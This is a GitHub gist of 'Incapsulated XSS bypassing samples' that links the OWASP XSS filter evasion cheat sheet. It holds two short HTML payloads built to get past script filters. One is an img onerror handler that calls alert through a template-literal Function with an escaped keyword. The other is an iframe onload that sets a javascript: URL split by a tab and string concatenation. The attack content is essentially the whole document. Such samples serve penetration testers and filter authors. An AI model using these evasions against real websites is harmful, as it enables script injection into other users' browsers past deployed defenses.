https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Last active
August 24, 2017 05:36
-
-
Save yamishi13/2c970f84a3015cc26412ae5211165c40 to your computer and use it in GitHub Desktop.
Incapsulated XSS bypassing samples
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<img/src=q onerror='new Function`al\ert\`Image onerror XSS\``'> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<iframe/onload='this["src"]="javas	cript:al"+"ert`Iframe onload XSS`"';> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment